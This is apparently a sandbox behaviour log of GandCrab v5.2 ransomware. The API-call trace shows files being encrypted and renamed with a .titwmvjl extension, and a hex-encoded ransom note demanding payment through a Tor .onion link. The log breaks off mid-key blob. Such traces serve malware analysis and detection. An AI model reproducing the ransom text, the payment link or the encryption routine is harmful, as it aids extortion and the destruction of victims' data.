dwFlags=0x0, pbData=0x2410000*, pdwDataLen=0x259f130*=0xc8, dwBufLen=0x100 | out: pbData=0x2410000*, pdwDataLen=0x259f130*=0x100) returned 1 [0094.922] GetLastError () returned 0x0 [0094.922] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0094.922] CryptDestroyKey (hKey=0x503978) returned 1 [0094.922] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0094.922] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0094.922] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0094.922] CryptAcquireContextW (in: phProv=0x259f100, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f100*=0x4c9980) returned 1 [0094.923] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0094.923] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259f104 | out: phKey=0x259f104*=0x503438) returned 1 [0094.923] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0094.923] CryptGetKeyParam (in: hKey=0x503438, dwParam=0x8, pbData=0x259f0f8, pdwDataLen=0x259f0fc, dwFlags=0x0 | out: pbData=0x259f0f8*=0x800, pdwDataLen=0x259f0fc*=0x4) returned 1 [0094.923] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0094.923] CryptEncrypt (in: hKey=0x503438, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410100*, pdwDataLen=0x259f130*=0xc8, dwBufLen=0x100 | out: pbData=0x2410100*, pdwDataLen=0x259f130*=0x100) returned 1 [0094.923] GetLastError () returned 0x0 [0094.924] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0094.924] CryptDestroyKey (hKey=0x503438) returned 1 [0094.924] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0094.924] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0094.924] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2650000 [0094.924] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2760000 [0094.924] ReadFile (in: hFile=0x2b4, lpBuffer=0x2650000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259f1dc, lpOverlapped=0x0 | out: lpBuffer=0x2650000*, lpNumberOfBytesRead=0x259f1dc*=0x4a15, lpOverlapped=0x0) returned 1 [0094.935] SetFilePointerEx (in: hFile=0x2b4, liDistanceToMove=0xffffb5eb, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0094.935] WriteFile (in: hFile=0x2b4, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x4a15, lpNumberOfBytesWritten=0x259f1c0, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x259f1c0*=0x4a15, lpOverlapped=0x0) returned 1 [0094.936] SetFilePointerEx (in: hFile=0x2b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0094.936] WriteFile (in: hFile=0x2b4, lpBuffer=0x2410000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259f1c0, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesWritten=0x259f1c0*=0x21c, lpOverlapped=0x0) returned 1 [0094.937] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.941] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.941] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.942] CloseHandle (hObject=0x2b4) returned 1 [0094.942] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\y1mF\\Z5FgCbIeuCS.gif" (normalized: "c:\\users\\ciihmnxmn6ps\\pictures\\y1mf\\z5fgcbieucs.gif"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\y1mF\\Z5FgCbIeuCS.gif.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\pictures\\y1mf\\z5fgcbieucs.gif.titwmvjl"), dwFlags=0x1) returned 1 [0094.943] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.943] FindNextFileW (in: hFindFile=0x5035b8, lpFindFileData=0x259f290 | out: lpFindFileData=0x259f290) returned 0 [0094.943] FindClose (in: hFindFile=0x5035b8 | out: hFindFile=0x5035b8) returned 1 [0094.943] CloseHandle (hObject=0x2ac) returned 1 [0094.944] FindNextFileW (in: hFindFile=0x5036f8, lpFindFileData=0x259f524 | out: lpFindFileData=0x259f524) returned 0 [0094.944] FindClose (in: hFindFile=0x5036f8 | out: hFindFile=0x5036f8) returned 1 [0094.944] CloseHandle (hObject=0x230) returned 1 [0094.944] FindNextFileW (in: hFindFile=0x503678, lpFindFileData=0x259f7b8 | out: lpFindFileData=0x259f7b8) returned 1 [0094.944] lstrcmpW (lpString1="PrintHood", lpString2=".") returned 1 [0094.944] lstrcmpW (lpString1="PrintHood", lpString2="..") returned 1 [0094.944] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\", lpString2="PrintHood" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\PrintHood") returned="C:\\Users\\CIiHmnxMn6Ps\\PrintHood" [0094.944] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\PrintHood", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\PrintHood\\") returned="C:\\Users\\CIiHmnxMn6Ps\\PrintHood\\" [0094.944] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x1e70000 [0094.945] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0094.945] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0094.945] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0094.945] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0094.945] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0094.945] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0094.945] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0094.946] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0094.946] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.946] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0094.946] wsprintfW (in: param_1=0x1e70200, param_2="%s\\%s-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\PrintHood\\\\TITWMVJL-DECRYPT.txt") returned 53 [0094.946] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\PrintHood\\\\TITWMVJL-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\printhood\\titwmvjl-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x230 [0095.022] lstrlenW (lpString="\xfeff\x2d\x2d\x2d\x3d\x20\x20\x20\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x56\x35\x2e\x32\x20\x20\x20\x20\x3d\x2d\x2d\x2d\x20\x0d\x0a\x0d\x0a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x55\x4e\x44\x45\x52\x20\x4e\x4f\x20\x43\x49\x52\x43\x55\x4d\x53\x54\x41\x4e\x43\x45\x53\x20\x44\x4f\x20\x4e\x4f\x54\x20\x44\x45\x4c\x45\x54\x45\x20\x54\x48\x49\x53\x20\x46\x49\x4c\x45\x2c\x20\x55\x4e\x54\x49\x4c\x20\x41\x4c\x4c\x20\x59\x4f\x55\x52\x20\x44\x41\x54\x41\x20\x49\x53\x20\x52\x45\x43\x4f\x56\x45\x52\x45\x44\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x09\x2a\x2a\x2a\x2a\x2a\x46\x41\x49\x4c\x49\x4e\x47\x20\x54\x4f\x20\x44\x4f\x20\x53\x4f\x2c\x20\x57\x49\x4c\x4c\x20\x52\x45\x53\x55\x4c\x54\x20\x49\x4e\x20\x59\x4f\x55\x52\x20\x53\x59\x53\x54\x45\x4d\x20\x43\x4f\x52\x52\x55\x50\x54\x49\x4f\x4e\x2c\x20\x49\x46\x20\x54\x48\x45\x52\x45\x20\x41\x52\x45\x20\x44\x45\x43\x52\x59\x50\x54\x49\x4f\x4e\x20\x45\x52\x52\x4f\x52\x53\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x41\x74\x74\x65\x6e\x74\x69\x6f\x6e\x21\x20\x0d\x0a\x0d\x0a\x41\x6c\x6c\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2c\x20\x64\x6f\x63\x75\x6d\x65\x6e\x74\x73\x2c\x20\x70\x68\x6f\x74\x6f\x73\x2c\x20\x64\x61\x74\x61\x62\x61\x73\x65\x73\x20\x61\x6e\x64\x20\x6f\x74\x68\x65\x72\x20\x69\x6d\x70\x6f\x72\x74\x61\x6e\x74\x20\x66\x69\x6c\x65\x73\x20\x61\x72\x65\x20\x65\x6e\x63\x72\x79\x70\x74\x65\x64\x20\x61\x6e\x64\x20\x68\x61\x76\x65\x20\x74\x68\x65\x20\x65\x78\x74\x65\x6e\x73\x69\x6f\x6e\x3a\x20\x2e\x54\x49\x54\x57\x4d\x56\x4a\x4c\x20\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x6f\x6e\x6c\x79\x20\x6d\x65\x74\x68\x6f\x64\x20\x6f\x66\x20\x72\x65\x63\x6f\x76\x65\x72\x69\x6e\x67\x20\x66\x69\x6c\x65\x73\x20\x69\x73\x20\x74\x6f\x20\x70\x75\x72\x63\x68\x61\x73\x65\x20\x61\x6e\x20\x75\x6e\x69\x71\x75\x65\x20\x70\x72\x69\x76\x61\x74\x65\x20\x6b\x65\x79\x2e\x20\x4f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x67\x69\x76\x65\x20\x79\x6f\x75\x20\x74\x68\x69\x73\x20\x6b\x65\x79\x20\x61\x6e\x64\x20\x6f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x72\x65\x63\x6f\x76\x65\x72\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2e\x0d\x0a\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x73\x65\x72\x76\x65\x72\x20\x77\x69\x74\x68\x20\x79\x6f\x75\x72\x20\x6b\x65\x79\x20\x69\x73\x20\x69\x6e\x20\x61\x20\x63\x6c\x6f\x73\x65\x64\x20\x6e\x65\x74\x77\x6f\x72\x6b\x20\x54\x4f\x52\x2e\x20\x59\x6f\x75\x20\x63\x61\x6e\x20\x67\x65\x74\x20\x74\x68\x65\x72\x65\x20\x62\x79\x20\x74\x68\x65\x20\x66\x6f\x6c\x6c\x6f\x77\x69\x6e\x67\x20\x77\x61\x79\x73\x3a\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x7c\x20\x30\x2e\x20\x44\x6f\x77\x6e\x6c\x6f\x61\x64\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x2d\x20\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x74\x6f\x72\x70\x72\x6f\x6a\x65\x63\x74\x2e\x6f\x72\x67\x2f\x20\x0d\x0a\x0d\x0a\x7c\x20\x31\x2e\x20\x49\x6e\x73\x74\x61\x6c\x6c\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x32\x2e\x20\x4f\x70\x65\x6e\x20\x54\x6f\x72\x20\x42\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x33\x2e\x20\x4f\x70\x65\x6e\x20\x6c\x69\x6e\x6b\x20\x69\x6e\x20\x54\x4f\x52\x20\x62\x72\x6f\x77\x73\x65\x72\x3a\x20\x20\x20\x68\x74\x74\x70\x3a\x2f\x2f\x67\x61\x6e\x64\x63\x72\x61\x62\x6d\x66\x65\x36\x6d\x6e\x65\x66\x2e\x6f\x6e\x69\x6f\x6e\x2f\x39\x39\x38\x61\x32\x66\x34\x35\x64\x32\x63\x61\x34\x64\x65\x66\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x7c\x20\x34\x2e\x20\x46\x6f\x6c\x6c\x6f\x77\x20\x74\x68\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x74\x68\x69\x73\x20\x70\x61\x67\x65\x20\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x4f\x6e\x20\x6f\x75\x72\x20\x70\x61\x67\x65\x20\x79\x6f\x75\x20\x77\x69\x6c\x6c\x20\x73\x65\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x70\x61\x79\x6d\x65\x6e\x74\x20\x61\x6e\x64\x20\x67\x65\x74\x20\x74\x68\x65\x20\x6f\x70\x70\x6f\x72\x74\x75\x6e\x69\x74\x79\x20\x74\x6f\x20\x64\x65\x63\x72\x79\x70\x74\x20\x31\x20\x66\x69\x6c\x65\x20\x66\x6f\x72\x20\x66\x72\x65\x65\x2e\x20\x0d\x0a\x0d\x0a\x0d\x0a\x41\x54\x54\x45\x4e\x54\x49\x4f\x4e\x21\x0d\x0a\x0d\x0a\x49\x4e\x20\x4f\x52\x44\x45\x52\x20\x54\x4f\x20\x50\x52\x45\x56\x45\x4e\x54\x20\x44\x41\x54\x41\x20\x44\x41\x4d\x41\x47\x45\x3a\x0d\x0a\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x4d\x4f\x44\x49\x46\x59\x20\x45\x4e\x43\x52\x59\x50\x54\x45\x44\x20\x46\x49\x4c\x45\x53\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x43\x48\x41\x4e\x47\x45\x20\x44\x41\x54\x41\x20\x42\x45\x4c\x4f\x57\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x6c\x41\x51\x41\x41\x42\x42\x6a\x58\x74\x68\x4a\x35\x51\x30\x77\x50\x44\x4f\x69\x52\x2f\x55\x55\x71\x42\x6a\x71\x4e\x47\x47\x52\x4d\x53\x45\x54\x66\x6e\x4b\x46\x4e\x2f\x77\x43\x30\x5a\x32\x79\x38\x75\x58\x4e\x4b\x2f\x63\x51\x52\x78\x51\x2b\x75\x78\x6a\x76\x48\x59\x6f\x52\x4e\x57\x4b\x4f\x77\x79\x70\x66\x53\x6e\x77\x69\x73\x61\x7a\x66\x6f\x32\x49\x75\x35\x76\x57\x57\x2b\x52\x43\x6b\x47\x47\x42\x31\x47\x6e\x65\x73\x51\x6b\x51\x77\x75\x54\x32\x41\x5a\x78\x56\x78\x35\x51\x59\x34\x69\x65\x2b\x6c\x65\x57\x2f\x4d\x5a\x41\x77\x47\x50\x70\x7a\x38\x2f\x37\x64\x5a\x77\x6f\x4c\x2b\x55\x71\x71\x4f\x77\x4d\x70\x54\x47\x33\x2b\x41\x6e\x76\x45\x51\x33\x4c\x4d\x6e\x49\x69\x51\x63\x70\x34\x48\x44\x66\x64\x33\x38\x4d\x50\x52\x43\x73\x52\x36\x67\x71\x63\x49\x48\x6f\x42\x70\x55\x4c\x77\x43\x33\x47\x6d\x37\x78\x7a\x74\x5a\x42\x69\x48\x47\x5a\x67\x5a\x56\x37\x4c\x6e\x61\x67\x51\x6b\x72\x4f\x41\x6c\x77\x54\x31\x36\x69\x70\x71\x4c\x31\x7a\x58\x54\x34\x6b\x4f\x79\x47\x45\x5a\x4c\x53\x6c\x71\x36\x48\x52\x57\x72\x52\x4a\x6b\x59\x53\x51\x35\x7a\x4c\x74\x50\x31\x54\x6b\x34\x68\x6d\x6d\x42\x51\x31\x66\x6f\x6a\x57\x46\x72\x63\x6f\x54\x34\x36\x78\x63\x76\x57\x2b\x33\x53\x33\x30\x6e\x56\x30\x46\x43\x51\x59\x64\x6a\x35\x68\x48\x66\x62\x50\x6c\x62\x4f\x52\x5a\x72\x69\x34\x6e\x2b\x65\x55\x43\x49\x6c\x46\x31\x74\x4b\x78\x62\x45\x69\x51\x74\x4a\x4e\x74\x66\x66\x74\x31\x76\x6b\x59\x31\x62\x6e\x78\x49\x64\x74\x45\x74\x57\x62\x49\x4e\x77\x6c\x75\x6e\x2f\x31\x39\x37\x67\x4f\x72\x72\x49\x58\x4a\x2b\x45\x70\x37\x61\x31\x73\x34\x68\x41\x54\x32\x6b\x45\x6b\x6d\x31\x48\x55\x4e\x39\x39\x46\x55\x4d\x7a\x2b\x49\x73\x51\x45\x4b\x35\x41\x44\x59\x6d\x35\x4a\x73\x42\x55\x61\x63\x59\x6c\x58\x52\x65\x77\x77\x78\x4e\x41\x55\x67\x6b\x77\x54\x51\x31\x69\x78\x57\x48\x63\x68\x36\x4c\x4e\x66\x6f\x46\x62\x78\x2f\x59\x30\x51\x67\x6c\x59\x47\x6c\x37\x36\x62\x4c\x67\x6c\x6a\x67\x6c\x50\x69\x61\x72\x2b\x46\x4d\x6d\x73\x4a\x6b\x48\x44\x78\x58\x46\x41\x64\x70\x56\x50\x4d\x4b\x54\x2b\x50\x70\x63\x6e\x32\x67\x31\x52\x65\x6f\x6d\x79\x5a\x73\x41\x77\x33\x30\x68\x4e\x4d\x79\x59\x43\x74\x79\x7a\x59\x56\x6d\x51\x7a\x4e\x56\x56\x77\x65\x76\x4d\x6b\x70\x71\x33\x44\x66\x76\x30\x76\x48\x65\x43\x6a\x58\x63\x30\x71\x67\x72\x38\x48\x53\x78\x6f\x57\x53\x6c\x56\x42\x7a\x55\x4c\x72\x47\x64\x77\x71\x7a\x61\x62\x59\x79\x6f\x72\x78\x32\x77\x62\x32\x6c\x50\x71\x6e\x43\x73\x4c\x2f\x59\x4f\x74\x63\x72\x69\x65\x50\x62\x77\x73\x57\x59\x46\x5a\x51\x47\x46\x63\x31\x4a\x6f\x71\x4a\x4a\x5a\x35\x4a\x74\x74\x4a\x35\x31\x45\x4c\x44\x52\x43\x4e\x4d\x44\x68\x74\x5a\x76\x42\x66\x61\x49\x7a\x65\x39\x54\x5a\x4c\x52\x61\x43\x42\x69\x30\x4d\x4a\x68\x54\x57\x30\x38\x74\x63\x66\x54\x6f\x62\x4a\x76\x4a\x30\x4d\x39\x34\x56\x62\x51\x44\x76\x2b\x4e\x51\x37\x6e\x6b\x78\x69\x35\x53\x33\x38\x67\x32\x46\x72\x4d\x38\x48\x75\x66\x71\x71\x49\x34\x5a\x67\x4c\x6f\x71\x43\x74\x45\x5a\x44\x67\x69\x62\x74\x42\x77\x51\x7a\x6d\x77\x30\x55\x2b\x64\x2f\x66\x69\x6d\x4d\x4e\x57\x66\x77\x4f\x55\x35\x65\x36\x77\x50\x4e\x6a\x50\x48\x5a\x6a\x73\x57\x38\x2f\x34\x48\x66\x30\x66\x67\x58\x41\x76\x42\x32\x2b\x67\x6b\x76\x52\x73\x75\x48\x53\x69\x75\x57\x53\x30\x5a\x78\x7a\x2f\x41\x42\x33\x4e\x69\x47\x4f\x64\x5a\x50\x64\x78\x72\x71\x4b\x71\x59\x49\x42\x4f\x6b\x4b\x35\x47\x48\x36\x6e\x39\x31\x51\x69\x74\x2f\x43\x66\x46\x66\x4e\x43\x68\x51\x59\x79\x73\x59\x48\x69\x45\x55\x31\x6d\x43\x4a\x2f\x46\x2f\x42\x6d\x65\x4a\x79\x37\x74\x41\x30\x55\x72\x62\x72\x6f\x4c\x53\x66\x45\x74\x7a\x53\x78\x63\x36\x4e\x73\x54\x48\x41\x65\x65\x6d\x48\x6e\x4e\x77\x38\x6d\x4c\x56\x41\x70\x52\x6e\x68\x50\x42\x36\x73\x36\x69\x5a\x66\x59\x6b\x62\x6f\x44\x4c\x45\x37\x64\x72\x56\x44\x6c\x52\x72\x66\x7a\x62\x6f\x63\x31\x56\x6e\x47\x76\x46\x66\x46\x42\x66\x2b\x5a\x37\x6b\x2b\x57\x55\x76\x6b\x6b\x68\x63\x41\x43\x5a\x69\x4b\x74\x6c\x50\x62\x70\x35\x34\x53\x2f\x73\x2b\x55\x73\x6d\x4e\x48\x6a\x55\x4e\x52\x36\x44\x78\x53\x49\x32\x31\x75\x61\x45\x50\x32\x4d\x30\x71\x75\x57\x53\x65\x46\x4a\x38\x77\x76\x61\x2b\x6e\x2f\x6c\x47\x35\x58\x75\x4c\x78\x4b\x4d\x59\x53\x44\x48\x4f\x61\x39\x79\x73\x34\x31\x48\x69\x51\x7a\x43\x33\x41\x33\x52\x67\x73\x2f\x78\x58\x4f\x74\x66\x4d\x31\x78\x6b\x56\x4d\x65\x6c\x5a\x78\x39\x64\x67\x6c\x6f\x66\x33\x34\x4a\x34\x47\x61\x6f\x45\x37\x53\x64\x34\x75\x41\x32\x6b\x79\x61\x4c\x76\x57\x62\x44\x43\x68\x55\x38\x5a\x46\x48\x48\x2b\x4c\x4f\x43\x66\x56\x41\x5a\x61\x48\x34\x55\x6e\x42\x65\x48\x63\x37\x68\x70\x36\x43\x53\x6a\x30\x4b\x77\x73\x31\x68\x30\x31\x46\x63\x58\x67\x74\x76\x6a\x43\x6e\x41\x70\x6a\x55\x37\x46\x72\x59\x53\x42\x43\x72\x77\x7a\x53\x73\x58\x4f\x55\x6b\x36\x41\x43\x34\x37\x41\x69\x56\x69\x48\x2f\x71\x45\x66\x42\x34\x44\x73\x66\x33\x72\x4e\x59\x38\x4a\x44\x62\x51\x54\x44\x72\x73\x57\x7a\x49\x39\x6f\x62\x71\x4e\x53\x4f\x46\x65\x2f\x4a\x4f\x73\x64\x4e\x4e\x56\x6c\x78\x39\x67\x51\x31\x79\x57\x59\x38\x4e\x65\x33\x51\x33\x76\x71\x62\x32\x61\x4e\x67\x6c\x67\x35\x2b\x6d\x6e\x66\x72\x4f\x50\x62\x51\x4a\x33\x66\x36\x53\x48\x79\x52\x53\x63\x68\x6f\x44\x72\x4a\x66\x7a\x38\x43\x69\x78\x75\x39\x53\x6b\x39\x38\x44\x59\x57\x66\x6a\x6e\x73\x70\x75\x35\x59\x64\x2f\x50\x78\x47\x44\x32\x55\x4f\x62\x6b\x30\x62\x68\x65\x4d\x78\x68\x52\x69\x73\x42\x63\x39\x42\x63\x7a\x53\x4f\x4c\x2b\x36\x74\x6c\x65\x62\x68\x42\x6d\x54\x68\x38\x4c\x46\x61\x56\x6f\x6d\x4b\x31\x53\x38\x75\x7a\x74\x73\x68\x52\x56\x63\x4f\x4a\x68\x70\x37\x6f\x2b\x48\x56\x35\x64\x51\x54\x35\x77\x41\x4c\x53\x79\x4c\x36\x67\x4e\x52\x47\x6e\x4f\x6a\x35\x34\x58\x51\x36\x75\x35\x36\x48\x2f\x70\x6a\x63\x2b\x54\x4b\x6c\x59\x30\x61\x57\x52\x76\x38\x76\x65\x63\x59\x44\x52\x44\x48\x4c\x55\x6e\x45\x48\x41\x42\x4c\x46\x71\x4a\x50\x36\x58\x79\x64\x31\x48\x53\x57\x32\x36\x4b\x65\x74\x6a\x56\x37\x4b\x6e\x42\x49\x68\x39\x46\x5a\x68\x67\x6b\x61\x64\x68\x71\x4f\x57\x75\x55\x67\x66\x6f\x53\x6f\x62\x72\x32\x61\x4d\x37\x59\x4f\x6a\x67\x5a\x52\x68\x44\x69\x6e\x59\x62\x31\x73\x54\x49\x49\x77\x62\x6d\x63\x64\x6f\x55\x45\x45\x62\x6a\x4c\x50\x7a\x33\x35\x2f\x70\x44\x62\x33\x72\x4b\x2f\x6a\x65\x53\x62\x43\x61\x70\x43\x68\x33\x7a\x43\x66\x66\x48\x72\x31\x68\x39\x58\x59\x57\x4c\x37\x6f\x67\x6c\x4b\x31\x49\x79\x39\x53\x6e\x50\x7a\x72\x4e\x74\x77\x35\x69\x6e\x6e\x35\x67\x46\x2f\x54\x62\x32\x32\x2f\x64\x78\x34\x2b\x32\x53\x61\x55\x48\x50\x78\x54\x79\x70\x4f\x79\x6b\x62\x66\x6a\x72\x57\x7a\x4e\x79\x4e\x34\x74\x38\x54\x70\x4a\x6d\x6a\x64\x76\x6d\x31\x41\x6c\x38\x53\x54\x53\x51\x73\x76\x76\x52\x55\x37\x45\x43\x61\x52\x37\x6e\x4c\x32\x41\x64\x42\x4e\x36\x4a\x32\x6d\x35\x6a\x6d\x64\x78\x54\x5a\x79\x64\x77\x4a\x50\x6e\x36\x31\x63\x70\x46\x39\x6b\x71\x44\x77\x2f\x74\x76\x4c\x4f\x4c\x4a\x43\x43\x7a\x56\x32\x5a\x44\x48\x33\x4f\x49\x6d\x56\x75\x69\x6e\x67\x31\x6c\x31\x65\x62\x63\x65\x42\x53\x45\x6a\x6f\x36\x52\x61\x36\x7a\x67\x75\x31\x4d\x6a\x32\x63\x58\x39\x57\x4d\x77\x31\x50\x78\x30\x53\x64\x32\x6c\x4d\x75\x77\x6d\x51\x6b\x34\x30\x36\x4f\x49\x64\x4c\x64\x55\x64\x34\x67\x6c\x71\x66\x30\x55\x48\x72\x38\x64\x66\x47\x4a\x79\x66\x62\x61\x4a\x45\x4c\x63\x74\x56\x36\x67\x36\x2b\x6e\x35\x66\x44\x71\x36\x56\x51\x41\x30\x72\x78\x78\x74\x79\x76\x6b\x43\x74\x68\x6d\x52\x4c\x73\x54\x67\x66\x4f\x6f\x58\x65\x34\x47\x37\x68\x39\x69\x4e\x75\x65\x73\x6f\x4d\x72\x30\x50\x6f\x61\x38\x6b\x4a\x5a\x54\x56\x68\x66\x33\x77\x54\x2f\x75\x75\x79\x64\x4d\x79\x55\x70\x63\x6c\x53\x49\x6a\x71\x2b\x66\x55\x49\x52\x72\x2b\x37\x6b\x2f\x57\x39\x4f\x39\x56\x73\x79\x32\x4e\x63\x78\x35\x70\x66\x2b\x53\x2b\x4d\x72\x4c\x31\x41\x6d\x35\x52\x51\x69\x33\x63\x36\x78\x46\x65\x54\x78\x33\x4d\x63\x5a\x52\x38\x30\x6e\x56\x69\x6e\x68\x75\x59\x6c\x69\x52\x51\x68\x4b\x4e\x6f\x4e\x57\x49\x32\x67\x48\x61\x47\x36\x6c\x52\x75\x7a\x2b\x51\x68\x47\x30\x52\x70\x4d\x59\x62\x7a\x42\x67\x4f\x6a\x35\x68\x69\x2f\x63\x63\x79\x55\x79\x68\x4d\x35\x66\x55\x49\x67\x63\x4a\x31\x39\x6c\x50\x64\x63\x6d\x76\x69\x78\x47\x6c\x6b\x35\x52\x38\x72\x6b\x32\x5a\x66\x78\x68\x4a\x78\x72\x46\x49\x75\x4c\x51\x54\x73\x52\x72\x61\x69\x7